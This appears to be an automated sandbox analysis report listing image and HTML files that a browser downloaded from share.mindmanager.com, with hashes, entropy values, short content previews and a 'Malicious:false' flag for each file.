                                                                URL:https://share.mindmanager.com/images/icon-align-right-disabled.png
                                                                Preview:.PNG........IHDR...3...0......5B.....bKGD..............pHYs.................tIME.........`l....IDATh..Oh.u..g.7..}/h .DlN...&.P.{xR4.I.X.Xk..]...."... ".AP..5.Q..M.(../.TJZ%-.....(}...wC................l.q..0.......*....e..d..*.....$.e...Ac./...~N1...H.5.*@....6.....?......P... $..eDL.v....u6..q...Q.......,YQ,3"...|.0?.c..wk...5l...n.?C......RKU.k2c.=b.....o..[...[|.N.,.N..3.)..XX....Q.[*TS..~.=..f:.0....n...9."...s..P.@B.7...!......?6.s.|Y.y..T$U...@..m...E..@&..?.Cx.rTE..*.o.`4%...("..A.S.y.nTE*..........QkD..J......_."@.0.a^.yv...6.B.y......p.G.%...U...u..gD..,.dl.6.40..W3.9.b...Z?(.f..|..n{.{'.9....nM..s+..<-.B]L..k..O._]..I........R..P.....e..oo..w...h.jV.T.@&)M@s.E...iO...?7%.}......4)..es.g|.qDD...Z.jUR.e...#$.....)..y......a[q...2...5..~../.F.nGx8.H..+........l....[........C..+........l ......Dx...s.....U!........&...N...v{.......G^+.......].....N.nE...M......nM^.a..nM..o.#.Y..h.~.T..;.c.[....x..;...!<.]..w......\ED1lS.l...a).
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2230
                                                                Entropy (8bit):4.357055008067036
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E51FB24D84D278E9FEB3B6C241DB3657
                                                                SHA1:429249C0AB7187B0E60BE3CAB2E32955173FD24C
                                                                SHA-256:38A57428084993707730A84C1CBC3E5A035204DF72BF715E1617EFF5FB2CBB56
                                                                SHA-512:A6EF22BA1E274BA7C926BB86A073DBAD62EF360276B5943DA8E9E3F08C9FC023B7087814200CC220010126D7D3E79CCFBBD27DECA129D85BE229473BF059021A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/inspector/group-comments.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 44 30">. <defs>. <style>.cls-1{fill:#3a52a4;}. </style>. </defs>. <title>comments off. </title>. <g id="Layer_2" data-name="Layer 2">. <g id="Layer_1-2" data-name="Layer 1">. <rect class="cls-1" x="19" y="12" width="6" height="1"/>. <rect class="cls-1" x="19" y="14" width="6" height="1"/>. <path class="cls-1" d="M29.85,12.2A5.48,5.48,0,0,0,29.36,11a6,6,0,0,0-.75-1.07q-.22-.25-.47-.49A6.47,6.47,0,0,0,27.62,9a8.44,8.44,0,0,0-1.22-.78A8.59,8.59,0,0,0,25,7.62a9.71,9.71,0,0,0-1.48-.35,10.25,10.25,0,0,0-3.12,0A9.58,9.58,0,0,0,19,7.62a8.81,8.81,0,0,0-1.37.57A8,8,0,0,0,16.38,9q-.28.21-.53.45a5.94,5.94,0,0,0-.47.49q-.21.25-.4.52a4.61,4.61,0,0,0-.34.56,5.48,5.48,0,0,0-.49,1.22A5,5,0,0,0,14,13.47a5.08,5.08,0,0,0,.16,1.27,5.32,5.32,0,0,0,.47,1.21,6.11,6.11,0,0,0,.77,1.1,7.06,7.06,0,0,0,1,1,4.86,4.86,0,0,1-.23.55,4.49,4.49,0,0,1-.42.69,6.22,6.22,0,0,1-.65.74,4.83,4.83,0,0,1-.92.7.42.42,0,0,0-.18.21.38.38,0,0,0,0,.26.3
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):39265
                                                                Entropy (8bit):4.354937905358587
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:137E257895F1D82B069085282BB30443
                                                                SHA1:03DDF78A8813A2C055522EAC973FFBE823CBE07F
                                                                SHA-256:849B575F5164A27F0CDC23D009299A2A23548F99DC96EE372FE38377AA1201AB
                                                                SHA-512:032BA9FAFF0403425FAD358B3BAED78494A4299C246AF151E2AEF50B89ADBE2AE06DFD5F9D12DB420053E0C59662B32959F5FEFE86D7E89903BE776B6368A2C3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_general.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="200" height="250" rx="10" fill="#D6E6FB"/>..<path d="M183.3 147.248C183.3 167.999 172.544 186.868 159.388 200.898C145.075 216.162 124.726 225.698 102.15 225.698C85.9943 225.698 71.7791 209.27 59.3002 200.898C38.3133 186.819 23.7002 174.419 23.7002 147.248C23.7002 115.808 42.1958 88.6867 68.9002 76.1726C78.9956 71.4417 83.3002 68.0242 116.9 72.0985C150.5 76.1727 155.59 96.529 168.9 120.898C174.991 132.051 183.3 133.645 183.3 147.248Z" fill="#A7C9F3"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M144.6 56.9709C128.403 56.9709 115.272 70.1018 115.272 86.2995C115.272 102.497 128.403 115.628 144.6 115.628C160.798 115.628 173.929 102.497 173.929 86.2995C173.929 70.1018 160.798 56.9709 144.6 56.9709ZM114.129 86.2995C114.129 69.4706 127.771 55.8281 144.6 55.8281C161.429 55.8281 175.072 69.4706 175.072 86.2995C175.072 103.128 161.429 116.771 144.6 116.771C127.771 116.771 114.1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1110
                                                                Entropy (8bit):4.9820858771383865
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:99B047657FA977D7B54235EB42EDB831
                                                                SHA1:466D3FCF909330DD84C83DE0D19A55377E12E31F
                                                                SHA-256:08127F5E7446AFC5D0AB64DD1B2A20BBBC8F4B5A8A9F1FEF2F9459CD21AEE370
                                                                SHA-512:1D0B541AC162E791E76A367961C576662E987FD35FF245F9368BB770980C8BC2AC5167732E15F4E9AF1A720F2B009B18BC50BA1470BB0C71AC5C221A78A8575A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_zoomin.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 13.58 14.6"><defs><style>.cls-1{fill:#c8c7c8;}.cls-2{fill:gray;}.cls-3{fill:#fff;}.cls-4{fill:#4f87c6;}</style></defs><title>context_zoomin</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M12.11,14.1a.24.24,0,0,1-.16,0l-4.3-4.3a.31.31,0,0,1,0-.25A1.14,1.14,0,0,1,7.93,9a1,1,0,0,1,.65-.32.26.26,0,0,1,.15,0L13,13a.33.33,0,0,1,0,.26,1.1,1.1,0,0,1-.32.54A1,1,0,0,1,12.11,14.1Z"/><path class="cls-2" d="M8.5,9.15l4.05,4a.72.72,0,0,1-.37.37l-4-4.05a1.22,1.22,0,0,1,.15-.22,1.22,1.22,0,0,1,.22-.15m.08-1a1.45,1.45,0,0,0-1,.47c-.5.49-.62,1.16-.28,1.5l4.3,4.31a.75.75,0,0,0,.51.19,1.52,1.52,0,0,0,1-.47h0c.49-.49.61-1.17.27-1.51l-4.3-4.3a.68.68,0,0,0-.5-.19Z"/><circle class="cls-3" cx="5.5" cy="5.5" r="5"/><path class="cls-2" d="M5.5,1A4.5,4.5,0,1,1,1,5.5,4.51,4.51,0,0,1,5.5,1m0-1A5.5,5.5,0,1,0,11,5.5,5.5,5.5,0,0,0,5.5,0Z"/><rect class="cls-4" x="5.07" y="3.35" width="1" height="5"/><rect class
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):402
                                                                Entropy (8bit):4.923757152674113
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:884A0E95F8AA2787317F9BC0786664CB
                                                                SHA1:4B36D06362C78795B49BBE3EF5218FEB1F715898
                                                                SHA-256:7266852BE6C9FC5C07D0E075A1A5F057D7BEAAEBB6433440C7802F4D6A93BB12
                                                                SHA-512:54C140D3D1F2C237F5FD24694748712670ED82191C238CE80D66AFEC18C815833BEB3DB62FBC48E649DB648869C3CB6869478529E486FE38BDBF629B3C654632
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/traffic-lights-red.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:gray;}.cls-2{fill:#f03637;}.cls-3{fill:#666;}</style></defs><title>signs_1_16</title><rect class="cls-1" x="4" width="8" height="16" rx="1" ry="1"/><circle class="cls-2" cx="8" cy="3" r="2"/><circle class="cls-3" cx="8" cy="8" r="2"/><circle class="cls-3" cx="8" cy="13" r="2"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):313
                                                                Entropy (8bit):5.10188026199626
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AEAD5FADA4105EAFB6D65D5915B07C81
                                                                SHA1:A76BA65535BF10131B47650BA1BDECECD297D4D9
                                                                SHA-256:E8FA7CE628A7D3D02ED5CFBB82491A2A6DDE625162B542DB5B87C0C6BC72EA80
                                                                SHA-512:F9C59CDE6514BBCD8D68192D91B4984F9F3BCF043C6FE03F100EEBFC5E2F04B94CD46A6B34A2A9779E19DCA4843294E308F40E4A41DB794E6B831B0CDD3F3090
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/vertical-divider.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1 16"><defs><style>.cls-1{fill:none;stroke:gray;stroke-miterlimit:10;}</style></defs><title>background_shape_Asset 77</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><line class="cls-1" x1="0.5" x2="0.5" y2="16"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):782
                                                                Entropy (8bit):5.078913148418506
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F3CED15F80D607384AAEB45738DAFC21
                                                                SHA1:3EF5BADCAC3E7A4940EA37DAD5423AA2E6C17192
                                                                SHA-256:387C8F476F17C45C1DA2C157ED63E4C1CFCC3E297AA9C088651724E4C348315B
                                                                SHA-512:36557E4707A85446749D8AA62DDC6505C7C50F518584D005C52C415F320C078C7BE1266EC01AC088C62086176021CD4F1B4F74027B32E20C9E03E201C6D4752C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_cost.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#efc46f;stroke:#b5863a;stroke-miterlimit:10;}.cls-2{fill:#b5863a;}</style></defs><title>topic_info_icon_cost</title><path class="cls-1" d="M4.43.5h8.12L11.39,4.36s3.95,1.13,3.95,11.1c.16,0-13.84,0-13.71,0,0-10,4-11.1,4-11.1Z"/><line class="cls-1" x1="6" y1="3.5" x2="11" y2="3.5"/><path class="cls-2" d="M8.22,13a2,2,0,0,1-2.07-1.85H7a1.25,1.25,0,0,0,1.25,1.12V10l-.1,0C7,9.71,6.32,9.19,6.32,8.27A1.84,1.84,0,0,1,8.22,6.5V5.69h.57V6.5a1.94,1.94,0,0,1,2,1.81H9.93A1.19,1.19,0,0,0,8.79,7.23V9.36l.14,0c1.2.29,1.88.78,1.88,1.77s-.92,1.74-2,1.82v.81H8.22Zm0-3.76v-2c-.71.09-1.08.52-1.08,1S7.42,9,8.22,9.23Zm.57.93v2.1c.87-.06,1.2-.49,1.2-1s-.25-.84-1.18-1.07Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1722
                                                                Entropy (8bit):4.241921119696286
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EA7602D886F00E9C1A68197CEF9F5BE5
                                                                SHA1:98658D9316AA9688B30D2D08122F78FB23BB6E50
                                                                SHA-256:7F5D98F0F37FE68316E3AB830C84C3B619D266C547B89CC8CAEF06B000F349B7
                                                                SHA-512:2CDB43C4082CA7C35D9F879BB49566BDC307B3ADE987CAD83A8064FA67E6036AFC10220F876DE357715D3C24FBF616C9EF6D9498C59ED4C8CD230F822D13A1DF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/new-folder-button.svg
                                                                Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M4 3.75C3.31421 3.75 2.75 4.31421 2.75 5V18C2.75 18.3315 2.8817 18.6495 3.11612 18.8839C3.35054 19.1183 3.66848 19.25 4 19.25H10.5C10.9142 19.25 11.25 19.5858 11.25 20C11.25 20.4142 10.9142 20.75 10.5 20.75H4C3.27065 20.75 2.57118 20.4603 2.05546 19.9445C1.53973 19.4288 1.25 18.7293 1.25 18V5C1.25 3.48579 2.48579 2.25 4 2.25H7.93388C8.38682 2.25234 8.83218 2.36654 9.23037 2.58243C9.62654 2.79722 9.96382 3.10606 10.2126 3.48174L11.0292 4.67686L11.0364 4.68751C11.1496 4.85946 11.3036 5.00078 11.4846 5.09891C11.6651 5.19677 11.8669 5.24866 12.0722 5.25H20C20.7293 5.25 21.4288 5.53973 21.9445 6.05546C22.4603 6.57118 22.75 7.27065 22.75 8V11C22.75 11.4142 22.4142 11.75 22 11.75C21.5858 11.75 21.25 11.4142 21.25 11V8C21.25 7.66848 21.1183 7.35054 20.8839 7.11612C20.6495 6.8817 20.3315 6.75 20 6.75H12.0661C11.6132 6.74766 11.1678 6.63346 10.7696 6.41
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text
                                                                Category:downloaded
                                                                Size (bytes):3229
                                                                Entropy (8bit):5.075856627878818
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9245E0B006C3D2D98AF6B1EAE8AE5047
                                                                SHA1:998A07EF876DB1B6FD6ECABBF209ED9A4860AA0F
                                                                SHA-256:BCDF022A3B6E5EEB8A242061FFEE359D5C5BE83705E9525771A013E46098C8A5
                                                                SHA-512:04282F4102C8DD31A8AC8CA46230ECF862370167366EBBD78B8DE9FAC3A95C1B6A648C41C7406AB0ADAE5C8BCEC7231C2A573600D26C24C930735C37411206F9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/index.html
                                                                Preview:.<!DOCTYPE html>.<html>.<head>. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="version" content="23.2.206">. <meta name="build" content="1717592584727">. <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=no">. <meta name="description" content="Industry-Leading Mind Mapping and Information Visualization. MindManager helps individuals, teams and enterprises do great work faster and more easily, by simplifying the way they capture, process and share information.">. <meta name="keywords" content="MindManager, mind map">.. <title>Visualize with MindManager</title>.. <link rel="stylesheet" type="text/css" href="css/app.min.css?v=23.2.206">. <link rel="shortcut icon" href="/favicon.ico?v=2">.. <link rel="manifest" href="/manifest.json">.. <script src="https://apis.google.com/js/client.js"></script>.</head>.<body>..<div class="font-loader" style="visibility: hidden"
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1759
                                                                Entropy (8bit):4.549551016921939
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:682C6F62B3F9D62208F1391BB3D8F929
                                                                SHA1:74BD6B06DD45EE734D22AF20F87C5BF3C98669C3
                                                                SHA-256:2B44887F8B588A01769490E4A0C72AEFABACF02C248E78563DA87589CA83F479
                                                                SHA-512:6E9C37CAAF85A0D1EA66BD31ECCA5C6D9D6BBBB4C9D7B49A0956EAB54667A4FD5CE628B34998595C49DA3057661FE6B2DE89065BBE28F4EAF61764CA55162C39
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/share.svg
                                                                Preview:<svg width="17" height="16" viewBox="0 0 17 16" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M10.8351 5.32375L7.25386 7.41274L6.75 6.54895L10.3312 4.45996L10.8351 5.32375Z" fill="#000B36"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M10.2961 11.6574L6.68164 9.5352L7.18796 8.67285L10.8024 10.795L10.2961 11.6574Z" fill="#000B36"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M5.09961 9.5C5.92804 9.5 6.59961 8.82843 6.59961 8C6.59961 7.17157 5.92804 6.5 5.09961 6.5C4.27118 6.5 3.59961 7.17157 3.59961 8C3.59961 8.82843 4.27118 9.5 5.09961 9.5ZM5.09961 10.5C6.48032 10.5 7.59961 9.38071 7.59961 8C7.59961 6.61929 6.48032 5.5 5.09961 5.5C3.7189 5.5 2.59961 6.61929 2.59961 8C2.59961 9.38071 3.7189 10.5 5.09961 10.5Z" fill="#000B36"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M12.3652 5.33301C13.1937 5.33301 13.8652 4.66143 13.8652 3.83301C13.8652 3.00458 13.1937 2.33301 12.3652 2.33301C11.5368 2.33301 10.8652 3.00458 10.8652 3
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):721
                                                                Entropy (8bit):5.139224931099663
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4D8BDD9C608E3FCD9FBE1B7FDD5057F7
                                                                SHA1:0F84403922A861EDD60E26A8CA506D8E40B17D2A
                                                                SHA-256:A8D5C1876487CE6A7586AE7DC1F4C3BBC19ACBF54D6CEC144C666771E8762D29
                                                                SHA-512:B7C357049084676B46B74AE466DD14D6C2A0E2F92D8AC2F0D3891EEB48E50112F172A154DF8044A7D616D080B5D2518C00DACD3081C49C4CE672FD2C638361CD
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/Icons/fixed-size.svg
                                                                Preview:<svg width="596px" height="596px" viewBox="0 0 596 596" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 51.1 (57501) - http://www.bohemiancoding.com/sketch -->. <desc>Created with Sketch.</desc>. <defs></defs>. <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="fixed-size" fill="#3E9EFF" fill-rule="nonzero">. <path d="M535.958,595.958 L60,595.958 C26.862915,595.958 1.15788101e-13,594.637085 0,561.5 L561.5,0 C594.637085,0 595.958,26.862915 595.958,60 L595.958,535.958 C595.958,569.095085 569.095085,595.958 535.958,595.958 Z" id="Rectangle-path"></path>. </g>. </g>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 51 x 48, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):481
                                                                Entropy (8bit):7.303290865135123
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FB6F9451E42F8B048F70170D6D9602E1
                                                                SHA1:5A7442ADBBE9E2C01EB77F199BA72F87BDB26A05
                                                                SHA-256:9387EEC022D2AF2808FDAC888802D8BD835D8F0188159099598B55A816DDADEB
                                                                SHA-512:ECE94A4E751BBF7651CCE3EF06BD4D7ABD55B697ABE3B8F2B1FDA337C214D53862D2B89681D2065BCB1BA449639E41376ABFB11E92680D948B5FBC8B2D83783C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-align-right.png
                                                                Preview:.PNG........IHDR...3...0......5B.....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<...nIDATx..q.@.E.....].J..\.)..: %S..*.W`...)......3H....;....zs..}-...`Pi...#1...E....i.a......:....==.P...84..`...!9AC.B8....<..6.<Z.O.Q..Q..zu.".].................!.._.....)./i&.$.lSn..b.`J+0......(.m..`...0..0..f..D..W.5.m...m.f.OX..4...H.d..w....HD..P.rN3.0 ..@W.i.$. %....jhh.P...X.t..pz)5..X..5....8....f|.5....3..q....a...L...[.8..+.....?F.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):41220
                                                                Entropy (8bit):4.29092225945614
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:750173E01CF948178A4C32A3EDC6A5AB
                                                                SHA1:9F298B187076548018D71EDAC3D0BC80EE8803FB
                                                                SHA-256:E7F6A90C27D1F76E355F0E953F45EBF438479574A60AA7A307F4784A676BDC5F
                                                                SHA-512:D5387FADA610E671B5687EEED4C0A0AF072382A86CA6F5D912FCE7B32188A19AB741C64ECA689178D8A54A29A60529D198C536A2B8ED46B3DF3AB3B02CD4802A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_plans_roadmaps.svg
                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_7372)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#CCEBEA"/>..<g clip-path="url(#clip1_456_7372)">..<g clip-path="url(#clip2_456_7372)">..<path d="M536.063 26.2193C550.425 25.9346 564.906 22.6637 579.027 25.3038C604.828 30.1278 624.428 56.9899 621.149 83.0327C617.871 109.076 592.223 130.241 566.032 128.519C557.571 127.963 548.891 125.371 540.798 127.9C530.013 131.269 523.395 142.809 512.675 146.382C498.158 151.222 479.701 139.075 468.526 130.764C456.999 122.191 443.63 109.398 438.299 95.6871C432.8 81.5418 433.786 62.8009 437.904 48.4431C441.595 35.5741 450.877 24.7289 463.259 19.5112C478.351 13.1508 490.67 17.9146 505.379 22.1626C515.346 25.0468 525.69 26.4144 536.063 26.2193V26.2193Z" fill="#9BDDD
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):771
                                                                Entropy (8bit):5.416732897660724
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:34BF15B66C51C7F3BEB78E2F4327BDD5
                                                                SHA1:D7A204DEC0E197EA236ADE9A902782DD6EEF8137
                                                                SHA-256:4EC3CD5B75EC27DD32170FE5A18BB92EBC9218F41EF65B7F5C15196733B284E6
                                                                SHA-512:F04C579281D4DEA54655D45ADBB8B5D4AF641EDAFAED5FB50F1C2FB389C8666A0ABBF3853EAC0171F287C101E71BF33F5BAC158700F217C3EEF2198DF1CBBE81
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_layout_left.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 19.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="21.2px" height="8.5px" viewBox="0 0 21.2 8.5" enable-background="new 0 0 21.2 8.5" xml:space="preserve">..<g>...<path fill="#5c707c" d="M17.2,8.5h-3.8c-2.2,0-4-1.8-4-4V4c0-2.2,1.8-4,4-4h3.8c2.2,0,4,1.8,4,4v0.5C21.2,6.7,19.4,8.5,17.2,8.5z.... M13.4,2c-1.1,0-2,0.9-2,2v0.5c0,1.1,0.9,2,2,2h3.8c1.1,0,2-0.9,2-2V4c0-1.1-0.9-2-2-2H13.4z"/>...<g>....<rect x="4.2" y="2.5" fill="#5c707c" width="6" height="2"/>....<g>.....<polygon fill="#5c707c" points="5.2,1 0,4 5.2,7 ..."/>....</g>...</g>..</g>..</svg>..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 51 x 36, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):1297
                                                                Entropy (8bit):7.755526324968595
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F7098C85787F4AD1CCCD0F7C75712C82
                                                                SHA1:45CDD3CA7189F74AE9B64F607E5A5369456DDF6A
                                                                SHA-256:63EA52D89239A0341E6FD303BB0E3ED9D353EC2322A249164E3A6C1044AA7E41
                                                                SHA-512:4F20CA430102887E142157F641A27055FD642A07FEB22EBF907C72E7E302862CB118F906E83F0C90EDAB6E92AED8A66CBA3150364652637CFDD28B9434176F2C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-shape-cloud.png
                                                                Preview:.PNG........IHDR...3...$.....$r......pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y]H.Q.......A.?..&H.b7iA......t..5,.N..... ...A....N0H..i^.B4.....?.yN.97..f.z..o.v..9.{..g.`0.%SZZZn.r9''.<.>...}\=.Z.s~...$....7..$..@.u]w.....f......r.|ssS..|bp..!.........%/B!.?..u.O..3..Dcc..n.k...1.YXX.............M^^..@ .YZn,.`......]/++.***..s....P.......z.............)6..|..3.[.+0.Q.......P\\,....>...............@jjj.<....fff.0X.',w..<...@rss.lmm.......\..FFF.....9..q.:.....)...+.amK...>n?b...]=..].UUU.R J.ta..<.i7.a.....Sm.E......c...N....K..!.2.eee%.!.....%\.b....,#..W. .*K...b.8..B].S..@....S..S.inn.......]]].Qk....b.M.X..}.&...4.dvv.H.t8......*..X......+...IB.g.cf"rC.L...i..".............cX..=.>./..Y.u..d.1..._..qc...t...>E..P....f..1%..?.H02...%c.Y7K...p3&.....[V...r...2! .x:*1...f..u.....C.Q.mm-m,TRR.?..k0d..`.Y...........|..9..e.t"........x...~a.ikk3.@aaaZ..x<*..n&...sss.e&.....4H.....@q.e.4AQ...Z.u...%[P..z..=2Y../.O.Z'.@
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):615
                                                                Entropy (8bit):5.057327289989109
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:79992A9C071EF445A6E4FA1E854BE112
                                                                SHA1:F942388411232FB94190953EDDCD424E0928E106
                                                                SHA-256:D31A5956991CFBE32243D327BD2B4E4A2DC2434F521197AA4A7A9A9B73434E61
                                                                SHA-512:AE418E880CBF3D291C13A78EBADCFA332C308339D1F65454A2B73DAA98901A21E54675AFEAAAC17A9B06D32EC6A2E6CD69FA46EB3E01622FCC07DDD764A91894
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/letter.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#51ace6;}.cls-2{fill:none;stroke:#51ace6;stroke-miterlimit:10;}</style></defs><title>documents_7_16</title><path class="cls-1" d="M14,4a1,1,0,0,1,1,1v7a1,1,0,0,1-1,1H2a1,1,0,0,1-1-1V5A1,1,0,0,1,2,4H14m0-1H2A2,2,0,0,0,0,5v7a2,2,0,0,0,2,2H14a2,2,0,0,0,2-2V5a2,2,0,0,0-2-2Z"/><line class="cls-2" x1="0.5" y1="3.5" x2="8" y2="9.5"/><line class="cls-2" x1="15.5" y1="4.17" x2="8" y2="9.5"/><line class="cls-2" x1="4.5" y1="7" x2="1" y2="12"/><line class="cls-2" x1="11.5" y1="7" x2="15" y2="12"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1903
                                                                Entropy (8bit):4.34205306215628
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9EEA3E0788959B1C481AE2C084B3EC39
                                                                SHA1:A728F6BE1FE7DDFF58D0D5473C041D0C5A1D2F3C
                                                                SHA-256:55B300CB447043AFA5BDEC96EB9EE5A352A3C83ACCE90B8B3D30E6E6906D32A5
                                                                SHA-512:71718CAF711101CF0AFA1A5A918C529A5878939DEFCA97AC9329859E81C6AB9DF467C050D12FB46544904B432E92D648449F4A0D190C130843599DD6AA02C919
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/priority08.svg
